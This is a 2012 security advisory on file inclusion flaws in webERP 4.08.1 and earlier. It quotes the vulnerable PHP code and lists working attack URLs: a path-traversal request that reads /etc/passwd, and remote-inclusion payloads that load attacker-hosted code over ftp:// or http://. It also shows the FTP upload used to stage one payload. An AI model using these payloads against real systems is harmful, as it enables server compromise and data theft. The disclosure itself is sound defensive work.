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[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-06-27 ]
# [ webERP <= 4.08.1 ] Local/Remote File Inclusion Vulnerability #
# Script: "Accounting & Best Practice Business Administration System"
# Vendor: http://www.weberp.org/
# Download: http://sourceforge.net/projects/web-erp/files/
# File: ./webERP/index.php (line: 4)
# 1 <?php
# 2 $PageSecurity=0;
# 3
# 4 include('includes/session.inc'); // 1
# ..cut..
# File: ./webERP/includes/session.inc (lines: 4-16)
# ..cut..
# 4 if (!isset($PathPrefix)) { // 2
# 5 $PathPrefix='';
# 6 }
# 7
# 8
# 9 if (!file_exists($PathPrefix . 'config.php')){ // 3
# 10 $rootpath = dirname(htmlspecialchars($_SERVER['PHP_SELF'],ENT_QUOTES,'UTF-8'));
# 11 if ($rootpath == '/' OR $rootpath == "\\") {
# 12 $rootpath = '';
# 13 }
# 14 header('Location:' . $rootpath . '/install/index.php');
# 15 }
# 16 include($PathPrefix . 'config.php'); // 4 [LFI]/[RFI]
# ..cut..
# [LFI] ( magic_quotes_gpc = Off; )
# Vuln: http://localhost/webERP/index.php?PathPrefix=../../../../../../etc/passwd%00
# [RFI #1] ( allow_url_fopen = On; allow_url_include = On; register_globals = On; )
# It is possible to bypass line: (!file_exists($PathPrefix . 'config.php')),
# when we use some url wrappers. For example ftp://
# Example:
# dun@rd01 ~ $ cat ./config.php
# <?php phpinfo(); ?>
# dun@rd01 ~ $ ftp ftp.server.com
# Connected to ftp.server.com.
# Name (ftp.server.com): user
# 331 User user OK. Password required
# Password:
# 230 OK. Current restricted directory is /
# ftp> put config.php
# local: config.php remote: config.php
# 200 PORT command successful
# 226 File successfully transferred
# ftp> quit
# 221 Logout.
# Now we can use url:
# Vuln: http://localhost/webERP/index.php?PathPrefix=ftp://user:password@ftp.server.com/
# In this case, script checks if the file 'ftp://user:password@ftp.server.com/' . 'config.php' does not exist.
# If exist, then include it.
# [RFI #2] ( allow_url_include = On; register_globals = On; )
# File: ./webERP/includes/LanguageSetup.php (lines: 29-84)
# ..cut..
# 29 if (!function_exists('gettext')) {
# ..cut..
# 34 require_once($PathPrefix . 'includes/php-gettext/streams.php');
# ..cut..
# 64 } else {
# 65 include($PathPrefix . 'includes/LanguagesArray.php');
# ..cut..
# 84 }
# ..cut..
# Vuln: http://localhost/webERP/includes/LanguageSetup.php?PathPrefix=http://localhost/phpinfo.txt?
### [ dun / 2012 ] #####################################################